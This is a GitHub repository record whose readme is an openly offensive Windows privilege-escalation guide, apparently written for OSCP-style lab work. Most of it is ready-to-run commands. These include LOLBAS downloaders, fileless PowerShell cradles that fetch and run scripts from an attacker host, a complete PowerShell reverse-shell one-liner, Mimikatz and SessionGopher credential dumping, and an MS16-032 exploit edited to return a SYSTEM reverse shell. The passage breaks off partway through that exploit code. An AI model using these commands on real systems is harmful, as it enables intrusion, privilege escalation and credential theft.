{"id":13539876,"url":"https://github.com/frizb/windows-privilege-escalation","last_synced_at":"2025-04-02T06:31:39.426Z","repository":{"id":39635470,"uuid":"91092743","full_name":"frizb/Windows-Privilege-Escalation","owner":"frizb","description":"Windows Privilege Escalation Techniques and Scripts","archived":false,"fork":false,"pushed_at":"2020-03-25T22:35:02.000Z","size":107,"stargazers_count":841,"open_issues_count":3,"forks_count":186,"subscribers_count":24,"default_branch":"master","last_synced_at":"2025-03-13T13:39:32.507Z","etag":null,"topics":["kali-linux","oscp","windows-enumeration","windows-hacking","windows-privilege-escalation","windows-scripts"],"latest_commit_sha":null,"homepage":null,"language":"Batchfile","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/frizb.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-05-12T13:09:50.000Z","updated_at":"2025-03-12T19:28:02.000Z","dependencies_parsed_at":"2022-08-09T15:07:34.553Z","dependency_job_id":null,"html_url":"https://github.com/frizb/Windows-Privilege-Escalation","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frizb%2FWindows-Privilege-Escalation","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frizb%2FWindows-Privilege-Escalation/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frizb%2FWindows-Privilege-Escalation/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/frizb%2FWindows-Privilege-Escalation/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/frizb","download_url":"https://codeload.github.com/frizb/Windows-Privilege-Escalation/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246768100,"owners_count":20830605,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["kali-linux","oscp","windows-enumeration","windows-hacking","windows-privilege-escalation","windows-scripts"],"created_at":"2024-08-01T09:01:33.356Z","updated_at":"2025-04-02T06:31:34.416Z","avatar_url":"https://github.com/frizb.png","language":"Batchfile","funding_links":[],"categories":["\u003ca id=\"1233584261c0cd5224b6e90a98cc9a94\"\u003e\u003c/a\u003e渗透\u0026\u0026offensive\u0026\u0026渗透框架\u0026\u0026后渗透框架","\u003ca id=\"3ed50213c2818f1455eff4e30372c542\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"a9494547a9359c60f09aea89f96a2c83\"\u003e\u003c/a\u003e后渗透","\u003ca id=\"4c2095e7e192ac56f6ae17c8fc045c51\"\u003e\u003c/a\u003e提权\u0026\u0026PrivilegeEscalation"],"readme":"# Windows-Privilege-Escalation\nHere is my step-by-step windows privlege escalation methodology. This guide assumes you are starting with a very limited shell like a webshell, netcat reverse shell or a remote telnet connection. \n\n## First things first and quick wins\nDo some basic enumeration to figure out who we are, what OS this is, what privs we have and what patches have been installed.\n\n```\nwhoami\nnet user \u003cusername\u003e\nsysteminfo\nnet config Workstation \nnet users \n\n```\nWhat is running on the machine?\nIf we are able to run WMIC we can pull rich details on the services and applications running:\n```\nwmic service list full \u003e services.txt\nwmic process \u003e processes.txt\n```\nOr alternatively:\n```\ntasklist \u003e processes.txt\n```\nHas a Windows Auto-login Password been set?\n```\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\"\n```  \nDump a tree of all the folders / files on the HDD  \n```\ntree c:\\ \u003e c:\\users\\public\\folders.txt\n```  \nor for a list of files:  \n```  \ndir /s c:\\ \u003e c:\\users\\public\\files.txt\n```  \n\n## Uploading files to the Windows machine  \nSometimes we will want to upload a file to the Windows machine in order to speed up our enumeration or to privilege escalate.  Often you will find that uploading files is not needed in many cases if you are able to execute PowerShell that is hosted on a remote webserver (we will explore this more in the upgrading Windows Shell, Windows Enumeration and Windows Exploits sections).  Uploading files increased the chances of being detected by antivirus and leaves unnecssary data trail behind. \nWe will look at 4 ways of uploading files to a remote Windows machine from Kali Linux:  \n1. VBScript HTTP Downloader\n2. PowerShell HTTP Downloader\n3. Python HTTP Downloader\n4. FTP Downloader\n\n*NOTE* There are MANY more ways to move files back and forth between a Windows machine, most can be found on the LOLBAS project:\nhttps://lolbas-project.github.io/\n\nMost of these will require that we create a simple local webserver on our Kali box to sevre the files (NOTE: I have had issues running this command within TMUX for whatever reason... so dont run it in TMUX).\nI like to use the Python Simple HTTP Server:\n```\nroot@kali:~/Documents/Exploits/WindowsPRIVZ# python -m SimpleHTTPServer 80\n```\nOr the Python pyftpdlib FTP Server (again don't run from TMUX):\n```\napt-get install python-pyftpdlib\nroot@kali:~/Documents/Exploits/WindowsPRIVZ# python -m pyftpdlib -p 21\n```\n\n### Uploading Files with VBScript  \nIn my experiance, VBScript is one of the easiest methods of transfering files to a remote Windows. The only downside is that the file size you can transfer is rather limited.  I often have trouble transfering anything over 1 MB using this method and have to fall back on other methods (Windows-privesc-check2.exe is much too large to transfer using this method).  \nFirst lets test to see if we can run VBScript  \n```\necho WScript.StdOut.WriteLine \"Yes we can run vbscript!\" \u003e testvb.vbs\n```\nNow we run it to see the results:  \n```\ncscript testvb.vbs\n```\nIf you see the following message, we are good to go with VBScript!:  \n```\nC:\\Users\\Test\u003ecscript testvb.vbs\nMicrosoft (R) Windows Script Host Version 5.812\nCopyright (C) Microsoft Corporation. All rights reserved.\n\nYes we can run vbscript!\n```\nIf you see the following messages, you should move on to PowerShell:  \n```\nC:\\temp\u003ecscript testvb.vbs\nThis program is blocked by group policy. For more information, contact your system administrator.\nC:\\temp\u003etestvb.vbs\nAccess is denied.\n```\n\nNow we can create a very simple downloader script by copying and pasting this single line of code into your windows commandline. I have tried to create a VBS script to download files from a remote webserver with the least possible number of lines of VBS code and I believe this is it.\nIf Windows is an older version of windows (Windows 8 or Server 2012 and below) use the following script:\n```\nCMD C:\\\u003e echo dim xHttp: Set xHttp = createobject(\"Microsoft.XMLHTTP\")  \u003e dl.vbs \u0026echo dim bStrm: Set bStrm = createobject(\"Adodb.Stream\")  \u003e\u003e dl.vbs \u0026echo xHttp.Open \"GET\", WScript.Arguments(0), False  \u003e\u003e dl.vbs \u0026echo xHttp.Send \u003e\u003e dl.vbs \u0026 echo bStrm.type = 1 \u003e\u003e dl.vbs \u0026echo bStrm.open \u003e\u003e dl.vbs \u0026 echo bStrm.write xHttp.responseBody \u003e\u003e dl.vbs \u0026echo bStrm.savetofile WScript.Arguments(1), 2 \u003e\u003e dl.vbs\n```\nIf Windows is a newer version (Windows 10 or Server 2016), try the following code:\n```\nCMD C:\\\u003e echo dim xHttp: Set xHttp = CreateObject(\"MSXML2.ServerXMLHTTP.6.0\")  \u003e dl.vbs \u0026echo dim bStrm: Set bStrm = createobject(\"Adodb.Stream\")  \u003e\u003e dl.vbs \u0026echo xHttp.Open \"GET\", WScript.Arguments(0), False  \u003e\u003e dl.vbs \u0026echo xHttp.Send \u003e\u003e dl.vbs \u0026echo bStrm.type = 1 \u003e\u003e dl.vbs \u0026echo bStrm.open \u003e\u003e dl.vbs \u0026echo bStrm.write xHttp.responseBody \u003e\u003e dl.vbs \u0026echo bStrm.savetofile WScript.Arguments(1), 2 \u003e\u003e dl.vbs\n```\n\nNow try to download a file to the local path:  \n```\nCMD C:\\\u003e cscript dl.vbs \"http://10.10.10.10/archive.zip\" \".\\archive.zip\"\n```\n\n### Uploading Files with CertUtil.exe\nI've found that CertUtil can be quite reliable when all else seems to fail.\n\n```\ncertutil.exe -urlcache -split -f http://10.10.10.10/exploit.exe\n```\n\n### Transfering Files using MSHTA\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA). And it can also be used to transfer files :D  \nHTML:  \n```\nC:\\\u003emshta http://10.10.10.10/badthings.exe\n```\n\nFTP:  \n```\nC:\\\u003emshta ftp://10.10.10.10:21/badthings.exe\n```\n\n### Trasfering Files using Bitsadmin\nBackground Intelligent Transfer Service (BITS) is a component of Microsoft Windows XP and later iterations of the operating systems, which facilitates asynchronous, prioritized, and throttled transfer of files between machines using idle network bandwidth. BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center.\n```\nC:\\\u003ebitsadmin /transfer badthings http://10.10.10.10:80/badthings.exe c:\\users\\public\\payload.exe\n```\n\n### Uploading Files with PowerShell  \n\nTest to see if we can run Powershell:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"get-host\"\n```\n\nTest to see if we can run Powershell Version 2:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Version 2 -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"$PSVersionTable\"\n```\n\nTry to download a file from a remote server to the windows temp folder from the Windows command line:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/exploit.exe\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\exploit.exe\\\")\"\n```\n\nOr from a PowerShell... shell:\n```powershell\nPS C:\\\u003e IEX(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/exploit.exe\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\exploit.exe\\\")\"\n```\nOR This one seems to work better while at the console:\n```powershell\nPS C:\\\u003e IEX(New-Object System.Net.WebClient).DownloadFile(\"http://10.10.10.10/exploit.exe\", \"C:\\Users\\Public\\Downloads\\exploit.exe\")\n```\n\n### Uploading Files with Python\nSometimes a Windows machine will have development tools like Python installed.\nCheck for python\n```\npython -h\n```\n\nDownload a file using Python:\n```\npython -c \"import urllib.request; urllib.request.urlretrieve('http://10.10.10.10/cat.jpg', 'C:\\\\Users\\\\Public\\\\Downloads\\\\cat.jpg');\"\n```\n\n### Uploading Files with Perl\nSometimes a Windows machine will have development tools like PERL installed.\nCheck for PERL\n```\nperl -v\n```\nDownload a file using PERL:\n```\nperl -le \"use File::Fetch; my $ff = File::Fetch-\u003enew(uri =\u003e 'http://10.10.10.10/nc.exe'); my $file = $ff-\u003efetch() or die $ff-\u003eerror;\"\n```\n\n### Uploading Files with FTP\nAfter running the python ftp lib on (`python -m pyftpdlib -p 21`) on Kali, you can try connecting using the windows FTP client:\n```\nC:\\Users\\pwnd\u003eftp 10.10.10.10\nConnected to 10.10.10.10\n220 pyftpdlib 1.5.3 ready.\nUser (10.10.15.31:(none)): anonymous\n331 Username ok, send password.\nPassword: anonymous\n\n230 Login successful.                                                                                                                      \nftp\u003e ls                                                                                                                                 \ndir                                                                                                                                       \n421 Active data channel timed out.                                                                                                       \n```\nIf you are seeing a 421 timeout when you try to send a command it is likely because your connection is being blocked by the windows firewall. The Windows command-line ftp.exe supports the FTP active mode only. In the active mode, the server has to connect back to the client to establish data connection for a file transfer. \n\nYou can check to see if the remote machine has Winscp.exe installed. Winscp is capable of connecting to an FTP server using passive mode and will not be blocked by the firewall.\n\n### Transfering Files via SMB using Impacket\nKali comes loade with the incredible Impacket library which is a swiss army knife of network protocols... just Awesome.  You can easily create a SMB share on your local Kali machine and move files between Kali and Windows with ease.  \nhttps://github.com/SecureAuthCorp/impacket  \n\nFirst we will setup the SMB Share on Kali like so:\n```\nroot@kali:~# impacket-smbserver root /root/Desktop\nImpacket v0.9.16-dev - Copyright 2002-2017 Core Security Technologies\n\n[*] Config file parsed\n[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0\n[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0\n[*] Config file parsed\n[*] Config file parsed\n[*] Config file parsed\n                                                                    \n```\n\nConfirm it is up and running using Net View on the Windows command line:\n```\nC:\\Users\\Null\u003enet view \\\\192.168.0.49\nShared resources at \\\\192.168.0.49\n\n(null)\n\nShare name  Type  Used as  Comment\n\n-------------------------------------------------------------------------------\nsmbshare    Disk\nThe command completed successfully.\n```\nThen we can trasnfer files from the command line as if it were a normal folder:  \n```\nC:\\Users\\Admin\u003edir \\\\192.168.0.49\\smbshare \nC:\\Users\\Admin\u003ecopy \\\\192.168.0.49\\smbshare\\loot.zip .  \n```\nBy far the most interesting feature of the SMB Share method is that you can execute files directly over the SMB Share without copying them to the remote machine (fileless execution is so hot right now):\n```\nC:\\Users\\Admin\u003e\\\\192.168.0.49\\smbshare\\payload.exe\n```\n\nA fancy trick I learned from IPPSec is to create a mapped drive to a remote SMB share like so:\n```\nnet use y: \\\\192.168.0.49\\smbshare  \ny: \ndir \n```\n## Execute a remote shell dropper\nOften, you can leverage PowerShell to execute a remotely hosted powershell script which contains a shell dropper (generated by the platform of your choosing).  \n\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle hidden -NonInteractive -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))\"\n```\n\nThere are also some no-so-well documented PowerShell argument shortcuts so can use things like -w rather than -WindowsStyle (handy for smaller payloads):  \n```\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w hidden -noni -nop -i None -ex Bypass -c \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))\"\n```  \n\n### Upgrading your Windows Shell\nYou might find that you are connected with a limited shell such as a Web shell, netcat shell or Telnet connection that simply is not cutting it for you. Here are a few oneliners you can use to upgrade your shell:\n\n### Upgrade Shell with PowerShell Nishang\nNishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.\n\n```bash\nroot@kali:~/test# git clone https://github.com/samratashok/nishang.git                                                  \nCloning into 'nishang'...\nremote: Enumerating objects: 1612, done.\nremote: Total 1612 (delta 0), reused 0 (delta 0), pack-reused 1612\nReceiving objects: 100% (1612/1612), 5.87 MiB | 6.62 MiB/s, done.\nResolving deltas: 100% (1010/1010), done.\nroot@kali:~/test# cd nishang/\nroot@kali:~/test/nishang# cd Shells/\nroot@kali:~/test/nishang/Shells# echo Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.10 -Port 4444 \u003e\u003e Invoke-PowerShellTcp.ps1\nroot@kali:~/test/nishang/Shells# python -m SimpleHTTPServer 80\n```\nNow open up a netcat listener on Kali:\n```bash\nnc -nlvp 4444\n```\nAnd Execute the remote powershell script hosted on your Kali SimpleHTTPServer \n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))\"\n```\n\n### Upgrade Windows Command Line with a Powershell One-liner Reverse Shell:  \nYou can run this oneliner from the remote Windows command prompt to skip the file upload step entirely (again be sure to update the IP and port):\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"\u0026{$client = New-Object System.Net.Sockets.TCPClient(\\\"10.10.10.10\\\",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u003e\u00261 | Out-String );$sendback2 = $sendback + \\\"PS \\\" + (pwd).Path + \\\"^\u003e \\\";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}\"\n```\n\n### Netcat Reverseshell Oneliners for Windows\nSometimes it is helpful to create a new Netcat session from an existed limited shell, webshell or unstable (short lived) remote shell.\n\n\n\n# Windows Enumeration\n*NOTE* There are many executables that could provide privledge escalation if they are being run by a privledged user, most can be found on the incredible LOLBAS project:\nhttps://lolbas-project.github.io/\n\n## Automated Windows Enumeration Scripts\nWe are also going to look a a few automated methods of performing Windows Enumeration including:\n* WindownPrivEsc.exe\n* Sherlock\n* Watson\n* JAWZ\n* Seatbelt\n\n### Running Windows Privesc Check (windows-privesc-check)\nThe Windows Privesc Check is a very powerful tool for finding common misconfigurations in a Windows system that could lead to privledge escalation.  It has not been updated for a while, but it is still as effective today as it was 5 years ago. The downside of this script is that it was written in Python and if the target system does not have Python installed, you will need to use an executable version that has a Python interpreter built in.  Having to include Python in the package makes the executable version is pretty large, coming in at a whopping 7.14 MB!!\n\nFirst we will need to clone the latest version to our environment:\n```bash\nroot@kali:~/tools# git clone https://github.com/pentestmonkey/windows-privesc-check\nCloning into 'windows-privesc-check'...\nremote: Enumerating objects: 1232, done.\nremote: Total 1232 (delta 0), reused 0 (delta 0), pack-reused 1232\nReceiving objects: 100% (1232/1232), 34.79 MiB | 4.61 MiB/s, done.\nResolving deltas: 100% (897/897), done.\n```\nNext we will need to setup a simple python HTTP webserver in Kali to host the file which the remote Windows box can download it from:\n```bash\nroot@kali:~/tools# cd windows-privesc-check/\nroot@kali:~/tools/windows-privesc-check# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nNow we will need to transfer the file to our remote windows box:\n```\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/windows-privesc-check2.exe\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\windows-privesc-check2.exe\\\");\n```\nAnd now we run the executeable on the remote machine. I like run with all the audit enabled like so:\n```\nC:\\Users\\Admin\u003ecd ..\nC:\\Users\u003ecd Public\nC:\\Users\\Public\u003ecd Downloads\nC:\\Users\\Public\\Downloads\u003ewindows-privesc-check2.exe --audit -a -o report\nwindows-privesc-check v2.0svn198 (http://pentestmonkey.net/windows-privesc-check)...\n```\nThe windows-privesc-check will create a detailed HTML report and text based report for your review.\n\n\n\n### Running Sherlock\nSherlock is a powershell library with a number of privledge escalation checkers built in. \nWe can stage and run sherlock on a remote http server so the file never needs to hit the remote server's HDD.  \n```bash\nroot@kali:~test# git clone https://github.com/rasta-mouse/Sherlock.git\nCloning into 'Sherlock'...\nremote: Enumerating objects: 3, done.\nremote: Counting objects: 100% (3/3), done.\nremote: Compressing objects: 100% (3/3), done.\nremote: Total 75 (delta 0), reused 2 (delta 0), pack-reused 72\nUnpacking objects: 100% (75/75), done.\nroot@kali:~test# cd Sherlock/\nroot@kali:~test/Sherlock# ls\nLICENSE  README.md  Sherlock.ps1\nroot@kali:~test/Sherlock# echo Find-AllVulns \u003e\u003e Sherlock.ps1\nroot@kali:~test/Sherlock# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nNow we can run this from the remote Windows CMD shell:  \n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1'))\"\n```\nOr from a Windows Powershell:\n```powershell\nPS C:\\\u003e IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/Sherlock.ps1')\n```\n\n### Running Watson\nSherlock has been superceded by a .net Windows enumeration platform called Watson which is frequently updated by the author.\nIt is a bit tricker to deploy and use as you need to compile it yourself and match the version of .net with the target system's version.\n\nFirst, on the target system we will need to check the versions of .Net that have been installed by navigating to the .net framework folder and poking around:\n```\ncd\\Windows\\Microsoft.NET\\Framework\\\ndir /s msbuild\n```\nOnly active versions of .NET will have the msbuild.exe.\nMake note of the available versions and leverage that to compile your version of Watson that targets the remote Windows machine.\nDownload the latest version of Watson from github:\n```\ngit clone https://github.com/rasta-mouse/Watson.git\n```\nAnd open it using Visual Studio.  In the Solution Explorer, click the Properties and modify the \"Target Framework:\" value to align with the remote Windows machine's version of the .Net framework. It will prompt you to reopen the project. Once the project has reloaded, Build the project under the Release mode (CTRL + SHIFT + B).  \n\nNext we will copy our Watson.exe to our Kali instance and setup a simple python HTTP webserver in Kali to host the file which the remote Windows box can download it from:  \n```bash\nroot@kali:~/tools# cd Watson/\nroot@kali:~/tools/Watson# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nNow we will need to transfer the compiled Watson.exe file to our remote windows box:\n```\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/Watson.exe\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\Watson.exe\\\");\n```\nAnd now we run the executeable on the remote machine. I like run with all the audit enabled like so:\n```\nC:\\Users\\Admin\u003ecd ..\nC:\\Users\u003ecd Public\nC:\\Users\\Public\u003ecd Downloads\nC:\\Users\\Public\\Downloads\u003eWatson.exe\n```\n\n### Running JAWS - Just Another Windows (Enum) Script\nJAWS is another powershell library that was built with privledge escalation of the OSCP lab machines in mind. \nWe can stage and run JAWS on a remote http server so the file never needs to hit the remote server's HDD.  \n```bash\nroot@kali:~test# git clone https://github.com/411Hall/JAWS\n```\nNow we can run this from the remote Windows CMD shell:  \n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/jaws-enum.ps1'))\"\n```\nOr from a Windows Powershell:\n```powershell\nPS C:\\\u003e IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/jaws-enum.ps1')\n```\nAnd we should see the following output start to appear:\n```\nRunning J.A.W.S. Enumeration\n        - Gathering User Information\n        - Gathering Processes, Services and Scheduled Tasks\n        - Gathering Installed Software\n```\n\n### Fireeye Session Gopher\nLeveraging credentials is still the most common ways of privledge escalation in Windows environments. Session Gopher is a PowerShell script designed to automaticlly harvest credentials from commonly used applications.\n\nTo run Session Gopher, we will first need to pull down the latest version from the Fireeye github repository:\n```\ngit clone https://github.com/fireeye/SessionGopher\nCloning into 'SessionGopher'...\nremote: Enumerating objects: 48, done.\nUnpacking objects: 100% (48/48), done.\nremote: Total 48 (delta 0), reused 0 (delta 0), pack-reused 48\n```\nNext we can serve it up on our local KALI instance by using the simple python HTTP server:\n```\nroot@kali:~/tools# cd SessionGopher/\nroot@kali:~/tools/SessionGopher# ls\nREADME.md  SessionGopher.ps1\nroot@kali:~/tools/SessionGopher# python -m SimpleHTTPServer 80\nServing HTTP on 0.0.0.0 port 80 ...\n```\nFinally we can file-lessly execute it from our remote Windows shell:\n```\n@\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/SessionGopher.ps1')); Invoke-SessionGopher -Thorough\"\n```\nOr from a Windows Powershell:\n```powershell\nPS C:\\\u003e IEX(New-Object Net.Webclient).downloadString('http://10.10.10.10/SessionGopher.ps1')\n```\nOr we can download and run it:\n```cmd\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/SessionGopher.ps1\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\SessionGopher.ps1\\\");\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"\u0026 { . .\\SessionGopher.ps1; Invoke-SessionGopher -Thorough}\"\n```\n## Running Mimikatz\nMimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows for the extraction of plaintext credentials from memory, password hashes from local SAM/NTDS.dit databases, advanced Kerberos functionality, and more.  \nhttps://github.com/gentilkiwi/mimikatz  \n\n### Running traditional (binary) Mimikatz\nThe original and most frequently updated version of Mimikatz is the binary executable which can be found here:  \nhttps://github.com/gentilkiwi/mimikatz/releases  \n\nFirst we will need to download a Mimikatz binary and copy it to the remote machine\n```\nroot@kali:~/test# wget https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180925/mimikatz_trunk.zip     \n--2018-10-16 15:14:49--  https://github.com/gentilkiwi/mimikatz/releases/download/2.1.1-20180925/mimikatz_trunk.zip                     \nroot@kali:~/test# unzip mimikatz_trunk.zip\n```\nNow we will need to copy the 3 files (win32 or x64 depending on the OS) required to run Mimikatz to the remote server.\n```\nCMD C:\\\u003e @\"%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command \"(New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/mimidrv.sys\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\mimidrv.sys\\\"); (New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/mimikatz.exe\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\mimikatz.exe\\\"); (New-Object System.Net.WebClient).DownloadFile(\\\"http://10.10.10.10/mimilib.dll\\\", \\\"C:\\\\Users\\\\Public\\\\Downloads\\\\mimilib.dll\\\")\"\n```\nNow, if we dont have an overly interactive shell, we will want to execute Mimikatz without the built in CLI by passing the correct parameters to the executable.  We use the log parameter to also log the clear password results to a file (just in case we are unable to see the output).\n```\nmimikatz log version \"sekurlsa::logonpasswords\" exit\n```\nOtherwise we can use the Mimikatz shell to get the passwords:\n```\nmimikatz.exe\nmimikatz # privilege::debug\nPrivilege '20' OK\nmimikatz # sekurlsa::logonpasswords\n```\n\n\n### Running Powershell Mimikatz\nThe Powershell version is not as frequently updated, but can be loaded into memory without ever hitting the HDD (Fileless execution).  This version simply reflectively loads the Mimikatz binary into memory so we could probably update it ourselves without much difficulty. \n\n```\nwget https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1\n```\nFileless execution of Mimikatz from remotely hosted server:\n```\nPS C:\\\u003e IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds\n```\n\n## Windows Kernel Exploits\n\n\n### MS16-032\nIf the remote machine appears to be vulnerable to MS16-032, we can execute a powershell script from a remote server to exploit it.\n```\nTitle      : Secondary Logon Handle\nMSBulletin : MS16-032\nCVEID      : 2016-0099\nLink       : https://www.exploit-db.com/exploits/39719/\nVulnStatus : Appears Vulnerable\n```\nGet the Powershell script from FuzzySecurity's Github, add an invoke to the end of the script and share the folder using the python SimpleHTTPServer:\n\n```\nroot@kali:~test# git clone https://github.com/FuzzySecurity/PowerShell-Suite.git\nCloning into 'PowerShell-Suite'...\nremote: Enumerating objects: 378, done.\nremote: Total 378 (delta 0), reused 0 (delta 0), pack-reused 378\nReceiving objects: 100% (378/378), 5.94 MiB | 2.06 MiB/s, done.\nResolving deltas: 100% (179/179), done.\nroot@kali:~test# cd PowerShell-Suite/\nroot@kali:~test/PowerShell-Suite# echo Invoke-MS16-032 \u003e\u003e Invoke-MS16-032.ps1 \nroot@kali:~test/PowerShell-Suite# python -m Simple\nSimpleDialog        SimpleHTTPServer    SimpleXMLRPCServer  \nroot@kali:~test/PowerShell-Suite# python -m SimpleHTTPServer 80\n```\nThe default version of the MS16-032 script will create a Pop-up CMD.exe window on the remote machine. Unfortunatly, we cannot access this from a limited shell... BUT we can modify the exploit to call a reverse shell.  Its pretty easy to modify it to call a reverse powershell that will connect back to our machine with a System shell.  We will need to modify line 330 of the exploit (the ip address and port will need to be updated of course):\n```powershell\n\t\t# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED\n\t\t#$CallResult = [Advapi32]::CreateProcessWithLogonW(\n\t\t#\t\"user\", \"domain\", \"pass\",\n\t\t#\t0x00000002, \"C:\\Windows\\System32\\cmd.exe\", \"\",\n\t\t#\t0x00000004, $null, $GetCurrentPath,\n\t\t#\t[ref]$StartupInfo, [ref]$ProcessInfo)\n\n\t\t# Modified to create a Powershell reverse shell \n\t\t$CallResult = [Advapi32]::CreateProcessWithLogonW(\n\t\t\t\"user\", \"domain\", \"pass\",\n\t\t\t0x00000002, \n\t\t\t'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe', 